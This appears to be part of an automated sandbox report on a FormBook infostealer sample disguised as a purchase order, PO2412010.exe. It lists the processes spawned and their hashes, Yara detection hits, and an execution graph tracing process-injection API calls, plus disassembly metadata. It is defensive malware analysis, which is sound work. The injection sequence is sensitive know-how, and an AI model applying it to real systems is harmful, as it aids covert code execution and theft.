                                                                      File size:877'568 bytes
                                                                      MD5 hash:60ABE4A88D6C409A3A4770CEF13C0222
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:09:14:21
                                                                      Start date:10/12/2024
                                                                      Path:C:\Users\user\Desktop\PO2412010.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\PO2412010.exe"
                                                                      Imagebase:0xfb0000
                                                                      File size:877'568 bytes
                                                                      MD5 hash:60ABE4A88D6C409A3A4770CEF13C0222
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:09:14:53
                                                                      Start date:10/12/2024
                                                                      Path:C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe"
                                                                      Imagebase:0x3a0000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:6
                                                                      Start time:09:14:54
                                                                      Start date:10/12/2024
                                                                      Path:C:\Windows\SysWOW64\isoburn.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                                      Imagebase:0x2f0000
                                                                      File size:107'008 bytes
                                                                      MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:9
                                                                      Start time:09:15:07
                                                                      Start date:10/12/2024
                                                                      Path:C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe"
                                                                      Imagebase:0x3a0000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:11
                                                                      Start time:09:15:20
                                                                      Start date:10/12/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6de060000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:10.2%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:169
                                                                        Total number of Limit Nodes:9
                                                                        execution_graph 41820 a3d580 41821 a3d5c6 41820->41821 41825 a3d75b 41821->41825 41828 a3d760 41821->41828 41822 a3d6b3 41827 a3d78e 41825->41827 41831 a3d090 41825->41831 41827->41822 41829 a3d090 DuplicateHandle 41828->41829 41830 a3d78e 41829->41830 41830->41822 41832 a3d7c8 DuplicateHandle 41831->41832 41833 a3d85e 41832->41833 41833->41827 41834 72e635d 41835 72e636f 41834->41835 41836 72e6218 41835->41836 41839 72e6ae8 41835->41839 41858 72e6ae1 41835->41858 41840 72e6b02 41839->41840 41877 72e7432 41840->41877 41884 72e74b5 41840->41884 41889 72e7054 41840->41889 41893 72e71fb 41840->41893 41898 72e709a 41840->41898 41902 72e70fa 41840->41902 41906 72e6f5e 41840->41906 41914 72e7780 41840->41914 41919 72e7480 41840->41919 41924 72e72c5 41840->41924 41928 72e74c7 41840->41928 41933 72e712d 41840->41933 41940 72e6fec 41840->41940 41945 72e6f8c 41840->41945 41953 72e73ef 41840->41953 41957 72e7212 41840->41957 41841 72e6b26 41841->41835 41859 72e6b02 41858->41859 41861 72e73ef 2 API calls 41859->41861 41862 72e6f8c 4 API calls 41859->41862 41863 72e6fec 2 API calls 41859->41863 41864 72e712d 4 API calls 41859->41864 41865 72e74c7 2 API calls 41859->41865 41866 72e72c5 2 API calls 41859->41866 41867 72e7480 2 API calls 41859->41867 41868 72e7780 2 API calls 41859->41868 41869 72e6f5e 4 API calls 41859->41869 41870 72e70fa 2 API calls 41859->41870 41871 72e709a 2 API calls 41859->41871 41872 72e71fb 2 API calls 41859->41872 41873 72e7054 2 API calls 41859->41873 41874 72e74b5 2 API calls 41859->41874 41875 72e7432 4 API calls 41859->41875 41876 72e7212 2 API calls 41859->41876 41860 72e6b26 41860->41835 41861->41860 41862->41860 41863->41860 41864->41860 41865->41860 41866->41860 41867->41860 41868->41860 41869->41860 41870->41860 41871->41860 41872->41860 41873->41860 41874->41860 41875->41860 41876->41860 41878 72e743f 41877->41878 41879 72e706e 41877->41879 41970 72e53e8 41878->41970 41974 72e53f0 41878->41974 41879->41841 41962 72e5338 41879->41962 41966 72e5340 41879->41966 41885 72e77ee 41884->41885 41887 72e53e8 Wow64SetThreadContext 41885->41887 41888 72e53f0 Wow64SetThreadContext 41885->41888 41886 72e7809 41887->41886 41888->41886 41890 72e705d 41889->41890 41891 72e5338 ResumeThread 41890->41891 41892 72e5340 ResumeThread 41890->41892 41891->41890 41892->41890 41894 72e6ff8 41893->41894 41895 72e70e7 41894->41895 41896 72e5338 ResumeThread 41894->41896 41897 72e5340 ResumeThread 41894->41897 41895->41895 41896->41894 41897->41894 41978 72e59b9 41898->41978 41982 72e59c0 41898->41982 41899 72e70c8 41899->41841 41986 72e58f9 41902->41986 41990 72e5900 41902->41990 41903 72e7118 41907 72e6f61 41906->41907 41994 72e5c3d 41907->41994 41998 72e5c48 41907->41998 41915 72e7784 41914->41915 41917 72e53e8 Wow64SetThreadContext 41915->41917 41918 72e53f0 Wow64SetThreadContext 41915->41918 41916 72e7809 41917->41916 41918->41916 41920 72e6ff8 41919->41920 41921 72e70e7 41920->41921 41922 72e5338 ResumeThread 41920->41922 41923 72e5340 ResumeThread 41920->41923 41921->41921 41922->41920 41923->41920 41925 72e72cd 41924->41925 41926 72e5338 ResumeThread 41925->41926 41927 72e5340 ResumeThread 41925->41927 41926->41925 41927->41925 41929 72e74d4 41928->41929 41931 72e59b9 WriteProcessMemory 41929->41931 41932 72e59c0 WriteProcessMemory 41929->41932 41930 72e76fd 41931->41930 41932->41930 42002 72e5aa8 41933->42002 42006 72e5ab0 41933->42006 41934 72e6ff8 41935 72e70e7 41934->41935 41936 72e5338 ResumeThread 41934->41936 41937 72e5340 ResumeThread 41934->41937 41936->41934 41937->41934 41942 72e6ff8 41940->41942 41941 72e70e7 41941->41941 41942->41941 41943 72e5338 ResumeThread 41942->41943 41944 72e5340 ResumeThread 41942->41944 41943->41942 41944->41942 41946 72e6f92 41945->41946 41947 72e6fc6 41946->41947 41951 72e5c3d CreateProcessA 41946->41951 41952 72e5c48 CreateProcessA 41946->41952 41948 72e70e7 41947->41948 41949 72e5338 ResumeThread 41947->41949 41950 72e5340 ResumeThread 41947->41950 41949->41947 41950->41947 41951->41947 41952->41947 41955 72e59b9 WriteProcessMemory 41953->41955 41956 72e59c0 WriteProcessMemory 41953->41956 41954 72e7413 41954->41841 41955->41954 41956->41954 41959 72e6ff8 41957->41959 41958 72e70e7 41959->41841 41959->41958 41960 72e5338 ResumeThread 41959->41960 41961 72e5340 ResumeThread 41959->41961 41960->41959 41961->41959 41963 72e5380 ResumeThread 41962->41963 41965 72e53b1 41963->41965 41965->41879 41967 72e5380 ResumeThread 41966->41967 41969 72e53b1 41967->41969 41969->41879 41971 72e5435 Wow64SetThreadContext 41970->41971 41973 72e547d 41971->41973 41973->41879 41975 72e5435 Wow64SetThreadContext 41974->41975 41977 72e547d 41975->41977 41977->41879 41979 72e5a08 WriteProcessMemory 41978->41979 41981 72e5a5f 41979->41981 41981->41899 41983 72e5a08 WriteProcessMemory 41982->41983 41985 72e5a5f 41983->41985 41985->41899 41987 72e5940 VirtualAllocEx 41986->41987 41989 72e597d 41987->41989 41989->41903 41991 72e5940 VirtualAllocEx 41990->41991 41993 72e597d 41991->41993 41993->41903 41995 72e5cd1 CreateProcessA 41994->41995 41997 72e5e93 41995->41997 41999 72e5cd1 CreateProcessA 41998->41999 42001 72e5e93 41999->42001 42003 72e5ab0 ReadProcessMemory 42002->42003 42005 72e5b3f 42003->42005 42005->41934 42007 72e5afb ReadProcessMemory 42006->42007 42009 72e5b3f 42007->42009 42009->41934 41813 72e7ef8 41816 72e7f03 41813->41816 41814 72e8083 41816->41814 41817 72e25bc 41816->41817 41818 72e8178 PostMessageW 41817->41818 41819 72e81e4 41818->41819 41819->41816 41792 a34668 41793 a3467a 41792->41793 41794 a34686 41793->41794 41796 a34778 41793->41796 41797 a3479d 41796->41797 41801 a34888 41797->41801 41805 a34878 41797->41805 41803 a348af 41801->41803 41802 a3498c 41802->41802 41803->41802 41809 a344b4 41803->41809 41806 a348af 41805->41806 41807 a3498c 41806->41807 41808 a344b4 CreateActCtxA 41806->41808 41808->41807 41810 a35918 CreateActCtxA 41809->41810 41812 a359db 41810->41812 42010 a3b218 42011 a3b227 42010->42011 42013 a3b300 42010->42013 42014 a3b344 42013->42014 42015 a3b321 42013->42015 42014->42011 42015->42014 42016 a3b548 GetModuleHandleW 42015->42016 42017 a3b575 42016->42017 42017->42011

                                                                        Executed Functions

                                                                        Function 08C14128 Relevance: 15.1, Strings: 10, Instructions: 2597COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4|dq$4|dq$$_q
                                                                        • API String ID: 0-1079538806
                                                                        • Opcode ID: b99c7108a105d8e901c09be67af741d25acfe14c9657c51b1019c02e2f8ac02f
                                                                        • Instruction ID: a5dc5d1bf3823e35379290047d7e13ea2d6d67f61a3b00f36643456f82965949
                                                                        • Opcode Fuzzy Hash: b99c7108a105d8e901c09be67af741d25acfe14c9657c51b1019c02e2f8ac02f
                                                                        • Instruction Fuzzy Hash: D843E474A00219CFCB24DF28C9C8A9DB7B2BF89311F158599E419AB365DB31ED82DF50
                                                                        Function 08C13668 Relevance: 7.0, Strings: 5, Instructions: 720COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o_q$(o_q$,cq$,cq$Hcq
                                                                        • API String ID: 0-4110691418
                                                                        • Opcode ID: 874752f1dbd3fb3c9b40a2c6e577e3210923e80ebfca25bbb4cfc5f977bbf498
                                                                        • Instruction ID: 1826839be507497b2e5b3d9dfceb6186e6b8bc70ba59b2c25ce648c90b114834
                                                                        • Opcode Fuzzy Hash: 874752f1dbd3fb3c9b40a2c6e577e3210923e80ebfca25bbb4cfc5f977bbf498
                                                                        • Instruction Fuzzy Hash: 4E528C34B00255DFCF08DF79C488A6EBBB2BF89315B158169E8069B364DB35ED42DB90
                                                                        Function 00A33E34 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1504 a33e34-a36fc2 1507 a36fc4 1504->1507 1508 a36fc9-a37153 call a35c74 call a35c84 call a35c94 call a35ca4 call a301f8 * 4 1504->1508 1507->1508 1540 a37160-a37247 1508->1540 1541 a37155-a3715b 1508->1541 1554 a3724f 1540->1554 1542 a37252-a3725f 1541->1542 1554->1542
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `Ybl$t^bl
                                                                        • API String ID: 0-921532137
                                                                        • Opcode ID: 10029c38e9d1c90f25662bdec9e6b7b6b28a710126821e8a325e6cb3bdeb1f51
                                                                        • Instruction ID: 9c9d605bf77a1e1fe5f1dba4669adf4294c592a3bb13d55c76cd969b7e50fae6
                                                                        • Opcode Fuzzy Hash: 10029c38e9d1c90f25662bdec9e6b7b6b28a710126821e8a325e6cb3bdeb1f51
                                                                        • Instruction Fuzzy Hash: CC81C474E00209DFDB08DFA9D994AEEBBB2FF88300F108529E419AB369DB355945CF51
                                                                        Function 00A36F90 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1596 a36f90-a36fc2 1597 a36fc4 1596->1597 1598 a36fc9-a3701f call a35c74 call a35c84 1596->1598 1597->1598 1606 a3702a-a3704d call a35c94 call a35ca4 1598->1606 1610 a37052-a37153 call a301f8 * 4 1606->1610 1630 a37160-a3722e 1610->1630 1631 a37155-a3715b 1610->1631 1643 a37238-a37247 1630->1643 1632 a37252-a3725f 1631->1632 1644 a3724f 1643->1644 1644->1632
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `Ybl$t^bl
                                                                        • API String ID: 0-921532137
                                                                        • Opcode ID: 56f5da104a88c564f8dbbd615db7d9053e1a67183a9960cb1c38b544a8701d28
                                                                        • Instruction ID: e1f4250d3000d542dc08848269beea8570107b82b4790c59f8e5417813c24dcf
                                                                        • Opcode Fuzzy Hash: 56f5da104a88c564f8dbbd615db7d9053e1a67183a9960cb1c38b544a8701d28
                                                                        • Instruction Fuzzy Hash: 8E51D670E012099FDB18DFA9D991ADEBBB2FF88300F10852AE415AB369DB345906CF51
                                                                        Function 08C11240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1704 8c11240-8c11271 1705 8c11273 1704->1705 1706 8c11278-8c1133d 1704->1706 1705->1706 1712 8c1138b-8c1139c 1706->1712 1713 8c1133f-8c11377 1712->1713 1714 8c1139e-8c11406 1712->1714 1717 8c11379 1713->1717 1718 8c1137e-8c11388 1713->1718 1722 8c11c60-8c11c8b 1714->1722 1717->1718 1718->1712 1724 8c11cb8-8c11cba 1722->1724 1725 8c11c8d-8c11cb6 1722->1725 1726 8c11cc0-8c11cd4 1724->1726 1725->1726 1728 8c1140b-8c11412 1726->1728 1729 8c11cda-8c11ce1 1726->1729 1730 8c11464-8c1149f 1728->1730 1732 8c114a5-8c114ae 1730->1732 1733 8c11414-8c1142a 1730->1733 1736 8c114b1-8c114e5 1732->1736 1734 8c11431-8c1144f 1733->1734 1735 8c1142c 1733->1735 1737 8c11451 1734->1737 1738 8c11456-8c11461 1734->1738 1735->1734 1740 8c11504-8c1152b 1736->1740 1741 8c114e7-8c11501 1736->1741 1737->1738 1738->1730 1744 8c11558 1740->1744 1745 8c1152d-8c11556 1740->1745 1741->1740 1746 8c11562-8c11570 1744->1746 1745->1746 1748 8c11660-8c1170d 1746->1748 1749 8c11576-8c1157d 1746->1749 1773 8c11713-8c11715 1748->1773 1774 8c1170f 1748->1774 1750 8c11643-8c11654 1749->1750 1751 8c11582-8c11598 1750->1751 1752 8c1165a-8c1165b 1750->1752 1754 8c1159a 1751->1754 1755 8c1159f-8c115fd 1751->1755 1756 8c11c07-8c11c42 1752->1756 1754->1755 1766 8c11604-8c11629 1755->1766 1767 8c115ff 1755->1767 1756->1736 1761 8c11c48-8c11c5f 1756->1761 1761->1722 1771 8c1162b-8c11637 1766->1771 1772 8c1163f-8c11640 1766->1772 1767->1766 1771->1772 1772->1750 1777 8c1171c-8c11723 1773->1777 1775 8c11711 1774->1775 1776 8c11717 1774->1776 1775->1773 1776->1777 1778 8c11731-8c11762 1777->1778 1779 8c11725-8c1172e 1777->1779 1781 8c117b5-8c117f0 1778->1781 1779->1778 1783 8c11764-8c11779 1781->1783 1784 8c117f6-8c11809 1781->1784 1785 8c11780-8c1179e 1783->1785 1786 8c1177b 1783->1786 1790 8c11811-8c11831 1784->1790 1791 8c1180b-8c119b2 1784->1791 1788 8c117a0 1785->1788 1789 8c117a5-8c117b2 1785->1789 1786->1785 1788->1789 1789->1781 1797 8c1183a-8c118fd 1790->1797 1794 8c119b4-8c119b5 1791->1794 1795 8c119ba-8c11a59 1791->1795 1796 8c11bc2-8c11bef 1794->1796 1813 8c11a60-8c11a92 1795->1813 1814 8c11a5b 1795->1814 1800 8c11bf1-8c11c05 1796->1800 1801 8c11c06 1796->1801 1815 8c11904-8c11917 1797->1815 1816 8c118ff 1797->1816 1800->1801 1801->1756 1822 8c11a94 1813->1822 1823 8c11a99-8c11acb 1813->1823 1814->1813 1817 8c11919 1815->1817 1818 8c1191e-8c1192b 1815->1818 1816->1815 1817->1818 1819 8c11932-8c11956 1818->1819 1820 8c1192d 1818->1820 1826 8c11958 1819->1826 1827 8c1195d-8c11977 1819->1827 1820->1819 1822->1823 1828 8c11ad2-8c11b2f 1823->1828 1829 8c11acd 1823->1829 1826->1827 1830 8c119a2-8c119a3 1827->1830 1831 8c11979-8c11998 1827->1831 1836 8c11b81-8c11ba3 1828->1836 1837 8c11b31-8c11b7b 1828->1837 1829->1828 1830->1796 1832 8c1199a 1831->1832 1833 8c1199f 1831->1833 1832->1833 1833->1830 1841 8c11bad-8c11bc0 1836->1841 1837->1836 1841->1796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        • Opcode ID: e1ef7d59a23ecc28f217ec17ec83eead965e1b4218a7f72c878f3570ea0469f7
                                                                        • Instruction ID: 7ab73d3649818fbba55c84347529e980187c5495a5c8d19bca9bf0fa7d9f52d8
                                                                        • Opcode Fuzzy Hash: e1ef7d59a23ecc28f217ec17ec83eead965e1b4218a7f72c878f3570ea0469f7
                                                                        • Instruction Fuzzy Hash: D762CD74E01228CFDB24DF69C984BDEBBB2BB49301F1491EAD409A7255DB34AE85CF50
                                                                        Function 072E0027 Relevance: .1, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 908eb49797ac8420c5f0db01b82e2a1a976f6a9d83d9cfc27596c6ccad096b29
                                                                        • Instruction ID: 58cef0721fd363be867dcad46faa5b3d721e50e2fe32ccc49f564bd583263c6e
                                                                        • Opcode Fuzzy Hash: 908eb49797ac8420c5f0db01b82e2a1a976f6a9d83d9cfc27596c6ccad096b29
                                                                        • Instruction Fuzzy Hash: 433130B0D29654CFDB18CF67C9442EEBFFAAFCA300F14D06AD409A7265DBB419468B50
                                                                        Function 072E0040 Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 827eef76775aa25f839aee8652a8ea968ed2c076dee4870383682ecebfbd38f7
                                                                        • Instruction ID: 75ad351be75be63ace24156fc736a6c4a7e425ac5c45d0b0436788a09b83bbc5
                                                                        • Opcode Fuzzy Hash: 827eef76775aa25f839aee8652a8ea968ed2c076dee4870383682ecebfbd38f7
                                                                        • Instruction Fuzzy Hash: DF21EEB0D25618CBDB18CF67C9446EEFAFBAFC9300F64D03AD409A6215DBB419468A50
                                                                        Function 08C1A348 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1314 8c1a348-8c1a35f 1316 8c1a361-8c1a370 1314->1316 1317 8c1a3c2-8c1a3d0 1314->1317 1316->1317 1320 8c1a372-8c1a37e call 8c18a74 1316->1320 1321 8c1a3e3-8c1a3e5 1317->1321 1322 8c1a3d2-8c1a3dd call 8c18a34 1317->1322 1328 8c1a380-8c1a38c call 8c18a84 1320->1328 1329 8c1a392-8c1a3ae 1320->1329 1327 8c1a3ec-8c1a3fb 1321->1327 1322->1321 1330 8c1a4a1-8c1a515 1322->1330 1336 8c1a413-8c1a416 1327->1336 1337 8c1a3fd-8c1a40c 1327->1337 1328->1329 1338 8c1a417-8c1a455 1328->1338 1343 8c1a3b4-8c1a3b8 1329->1343 1344 8c1a45c-8c1a49a 1329->1344 1359 8c1a517-8c1a51d 1330->1359 1360 8c1a52d-8c1a52e 1330->1360 1337->1336 1338->1344 1343->1317 1344->1330 1361 8c1a521-8c1a523 1359->1361 1362 8c1a51f 1359->1362 1361->1360 1362->1360
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Hcq$Hcq$Hcq
                                                                        • API String ID: 0-687564024
                                                                        • Opcode ID: a2e8a8fe0d01b0682ff1ec816a6890f32ff912d52b5f0c0b9b2660534df0cdf4
                                                                        • Instruction ID: 1a11d18ec7c00ba78f2221022116341116b42d3d0986089eb40cd96ed0c25a07
                                                                        • Opcode Fuzzy Hash: a2e8a8fe0d01b0682ff1ec816a6890f32ff912d52b5f0c0b9b2660534df0cdf4
                                                                        • Instruction Fuzzy Hash: 5D41CF303046108BEBA5AAB8955062E66EBEFC5345B64887DD506DB385EF24ED03C762
                                                                        Function 06F99260 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1363 6f99260-6f99276 1364 6f99333-6f99342 1363->1364 1366 6f9934d-6f993ae 1364->1366 1381 6f9932a 1366->1381 1383 6f99280 1381->1383 1384 6f99287-6f99331 1381->1384 1383->1364 1383->1384 1385 6f99315-6f99329 1383->1385 1386 6f992b7-6f992d5 1383->1386 1384->1381 1391 6f992dc-6f992e9 1386->1391 1392 6f992d7-6f992da 1386->1392 1393 6f992eb-6f992fa 1391->1393 1392->1393 1396 6f992fc-6f99302 1393->1396 1397 6f99312 1393->1397 1398 6f99304 1396->1398 1399 6f99306-6f99308 1396->1399 1397->1385 1398->1397 1399->1397
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8cq$8cq$8cq
                                                                        • API String ID: 0-1458523781
                                                                        • Opcode ID: b3f7d847b1e9091aae1750c1a4b3ec7af1daeaa58f7ca3a1508cd80e27d4d6ab
                                                                        • Instruction ID: b06759ffdc1afaa26c4b0a0518dc80165c8c8982dcd9cb211b5fcde309b1003b
                                                                        • Opcode Fuzzy Hash: b3f7d847b1e9091aae1750c1a4b3ec7af1daeaa58f7ca3a1508cd80e27d4d6ab
                                                                        • Instruction Fuzzy Hash: F8319636A04205DFFF849FA585459BE76B9EBC8300F59841ED50AA73C4DAB1980287F3
                                                                        Function 06F9839F Relevance: 3.8, Strings: 3, Instructions: 39COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1422 6f9839f-6f983d7 1424 6f983e0-6f983e2 1422->1424 1425 6f983fa-6f98417 1424->1425 1426 6f983e4-6f983ea 1424->1426 1430 6f9841d-6f98513 1425->1430 1431 6f98582-6f98587 1425->1431 1427 6f983ec 1426->1427 1428 6f983ee-6f983f0 1426->1428 1427->1425 1428->1425
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$$_q$$_q
                                                                        • API String ID: 0-336898379
                                                                        • Opcode ID: 6cd59d203818ba37b0452a3f4c5b5e939e444566828e6e77d35dfe8e01136c5b
                                                                        • Instruction ID: 30d05e093c133d54b3c126a9dd5b358143fd4f2ee32bd91243704cb60a3feaba
                                                                        • Opcode Fuzzy Hash: 6cd59d203818ba37b0452a3f4c5b5e939e444566828e6e77d35dfe8e01136c5b
                                                                        • Instruction Fuzzy Hash: 9001F930B50205DFFFA88B34CC6BFA97761BB41740F248C66E8169F685EAB09C50C7A1
                                                                        Function 072E53E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1434 72e53e8-72e543b 1436 72e543d-72e5449 1434->1436 1437 72e544b-72e547b Wow64SetThreadContext 1434->1437 1436->1437 1439 72e547d-72e5483 1437->1439 1440 72e5484-72e54b4 1437->1440 1439->1440
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072E546E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
